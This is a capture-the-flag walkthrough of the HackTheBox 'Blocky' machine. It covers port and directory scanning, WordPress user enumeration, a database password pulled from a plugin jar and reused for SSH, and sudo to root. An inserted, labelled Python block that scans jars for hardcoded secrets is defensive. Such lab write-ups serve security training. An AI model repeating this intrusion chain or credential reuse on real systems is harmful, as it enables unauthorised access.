Welcome to the Blocky writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Blocky

tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficulty: Easy
OS: Linux

Enumeration

Nmap

To get started, we run a quick scan of all TCP ports.

$ nmap -p- -T4 10.10.10.37
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 19:38 CEST
Nmap scan report for 10.10.10.37
Host is up (0.10s latency).
Not shown: 65530 filtered ports
PORT      STATE  SERVICE
21/tcp    open   ftp
22/tcp    open   ssh
80/tcp    open   http
8192/tcp  closed sophos
25565/tcp open   minecraft

Nmap done: 1 IP address (1 host up) scanned in 156.69 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 21,22,80,8192,25565 10.10.10.37
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 19:42 CEST
Nmap scan report for 10.10.10.37
Host is up (0.10s latency).

PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Device type: general purpose|WAP|specialized|storage-misc|broadband router|printer
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (94%), Asus embedded (90%), Crestron 2-Series (89%), HP embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3.4
Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 4.2 (94%), Linux 4.4 (94%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.12 (91%), Linux 3.2 - 4.9 (91%), Linux 3.8 - 3.11 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8192/tcp)
HOP RTT       ADDRESS
1   101.83 ms 10.10.14.1
2   102.62 ms 10.10.10.37

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.84 seconds

Port 80

Gobuster

$ gobuster dir -w /usr/share/wordlists/custom.txt -u http://10.10.10.37/ -x php -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.37/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/custom.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/05/10 19:47:27 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess.php        (Status: 403) [Size: 299]
/.htaccess            (Status: 403) [Size: 295]
/.hta.php             (Status: 403) [Size: 294]
/.htaccess            (Status: 403) [Size: 295]
/.htaccess.php        (Status: 403) [Size: 299]
/.htpasswd            (Status: 403) [Size: 295]
/.htpasswd.php        (Status: 403) [Size: 299]
/.htpasswd.php        (Status: 403) [Size: 299]
/.htpasswd            (Status: 403) [Size: 295]
/index.php            (Status: 301) [Size: 0] [--> http://10.10.10.37/]
/index.php            (Status: 301) [Size: 0] [--> http://10.10.10.37/]
/javascript           (Status: 301) [Size: 315] [--> http://10.10.10.37/javascript/]
/javascript           (Status: 301) [Size: 315] [--> http://10.10.10.37/javascript/]
/phpmyadmin           (Status: 301) [Size: 315] [--> http://10.10.10.37/phpmyadmin/]
/phpmyadmin           (Status: 301) [Size: 315] [--> http://10.10.10.37/phpmyadmin/]
/plugins              (Status: 301) [Size: 312] [--> http://10.10.10.37/plugins/]   
/server-status        (Status: 403) [Size: 299]                                     
/server-status        (Status: 403) [Size: 299]                                     
/wiki                 (Status: 301) [Size: 309] [--> http://10.10.10.37/wiki/]      
/wp-admin             (Status: 301) [Size: 313] [--> http://10.10.10.37/wp-admin/]  
/wp-admin             (Status: 301) [Size: 313] [--> http://10.10.10.37/wp-admin/]  
/wp-content           (Status: 301) [Size: 315] [--> http://10.10.10.37/wp-content/]
/wp-blog-header.php   (Status: 200) [Size: 0]                                       
/wp-cron.php          (Status: 200) [Size: 0]                                       
/wp-config.php        (Status: 200) [Size: 0]                                       
/wp-config.php        (Status: 200) [Size: 0]                                       
/wp-includes          (Status: 301) [Size: 316] [--> http://10.10.10.37/wp-includes/]
/wp-load.php          (Status: 200) [Size: 0]                                        
/wp-mail.php          (Status: 403) [Size: 3444]                                     
/wp-links-opml.php    (Status: 200) [Size: 219]                                      
/wp-login.php         (Status: 200) [Size: 2402]                                     
/wp-login.php         (Status: 200) [Size: 2402]                                     
/wp-settings.php      (Status: 500) [Size: 0]                                        
/wp-signup.php        (Status: 302) [Size: 0] [--> http://10.10.10.37/wp-login.php?action=register]
/wp-trackback.php     (Status: 200) [Size: 135]                                                    
/wp-trackback.php     (Status: 200) [Size: 135]                                                    
/xmlrpc.php           (Status: 405) [Size: 42]                                                     
/xmlrpc.php           (Status: 405) [Size: 42]                                                     
/xmlrpc.php           (Status: 405) [Size: 42]                                                     

===============================================================
2021/05/10 20:05:39 Finished
===============================================================

Wpscan

$ wpscan --url http://10.10.10.37/ -e --plugins-detection aggressive
[...]
[i] No plugins Found.
[...]
[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[...]

Well, inside the plugins directory we find two files, BlockyCore.jar and griefprevention-1.11.2-3.1.1.298.jar. Let's download them and analyze them.

$ jar xf BlockyCore.jar
$ strings com/myfirstplugin/BlockyCore.class
com/myfirstplugin/BlockyCore
java/lang/Object
sqlHost
Ljava/lang/String;
sqlUser
sqlPass
<init>
Code
    localhost   
root    
8YsqfCTnvxAUeduzjNSXe22 
LineNumberTable
LocalVariableTable
this
Lcom/myfirstplugin/BlockyCore;
onServerStart
onServerStop
onPlayerJoin
TODO get username
!Welcome to the BlockyCraft!!!!!!!
sendMessage
'(Ljava/lang/String;Ljava/lang/String;)V
username
message
SourceFile
BlockyCore.java

Mmmm, interesting string... 8YsqfCTnvxAUeduzjNSXe22.

We have a user and this string... Let me try...
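As an added example (not part of the original writeup), here is a small Python scanner that does what `strings` did above but properly: it walks the class-file constant pool of every .class in a jar and reports credential-looking identifiers together with the real CONSTANT_String literals they sit next to, which is the check a plugin maintainer would run on a build before shipping it. The `sample_class()` bytes are a constructed stand-in for BlockyCore.class with a placeholder value, not the real file.

```python
import struct
import zipfile

# Payload size of constant-pool tags that carry no text (JVM spec, section 4.4).
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
          12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
CRED_HINTS = ("pass", "pwd", "secret", "token")

def constant_pool(data):
    """Return ({index: utf8 text}, [utf8 indexes referenced by CONSTANT_String])."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    (count,) = struct.unpack(">H", data[8:10])
    pos, idx, utf8, literals = 10, 1, {}, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:                          # CONSTANT_Utf8: u2 length + bytes
            (n,) = struct.unpack(">H", data[pos:pos + 2])
            utf8[idx] = data[pos + 2:pos + 2 + n].decode("utf-8", "replace")
            pos += 2 + n
        else:
            if tag == 8:                      # CONSTANT_String -> Utf8 index
                literals.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += _FIXED[tag]
        idx += 2 if tag in (5, 6) else 1      # long/double occupy two slots
    return utf8, literals

def scan_class(data):
    """Credential-looking names in the pool, plus every string literal."""
    utf8, literals = constant_pool(data)
    hints = [s for s in utf8.values() if any(h in s.lower() for h in CRED_HINTS)]
    return {"hints": hints, "literals": [utf8[i] for i in literals]}

def scan_jar(path):
    """{class entry: findings} for each .class in the jar that has a hint."""
    with zipfile.ZipFile(path) as jar:
        found = {n: scan_class(jar.read(n)) for n in jar.namelist() if n.endswith(".class")}
    return {n: r for n, r in found.items() if r["hints"]}

def sample_class():
    """Constructed stand-in for BlockyCore.class (placeholder value, not the real one)."""
    def utf8(s):
        return b"\x01" + struct.pack(">H", len(s)) + s.encode()
    pool = [utf8("sqlPass"), utf8("localhost"), utf8("PLACEHOLDER_VALUE"),
            b"\x08\x00\x02", b"\x08\x00\x03", b"\x07\x00\x02"]   # String#2, String#3, Class#2
    header = b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + struct.pack(">H", len(pool) + 1)
    return header + b"".join(pool)
```

Run `scan_jar("BlockyCore.jar")` on the downloaded plugin to get the same sqlHost/sqlUser/sqlPass finding without the noise of method and type names that `strings` prints.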

SSH

First I tested root, since BlockyCore.class also mentions the root user, but it did not work, so we are going to use notch.

$ ssh notch@10.10.10.37
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.

Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
notch@Blocky:~$ cat user.txt 
CENSORED_FLAG
notch@Blocky:~$

And we are in!!

Post exploitation

Enumeration

Sudo

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

Really? ok...

Privilege escalation

notch@Blocky:~$ sudo su
root@Blocky:/home/notch# id
uid=0(root) gid=0(root) groups=0(root)
root@Blocky:/home/notch# cd /root
root@Blocky:~# ls
root.txt
root@Blocky:~# cat root.txt 
CENSORED_FLAG
root@Blocky:~#

Easy peasy 🤷‍♂️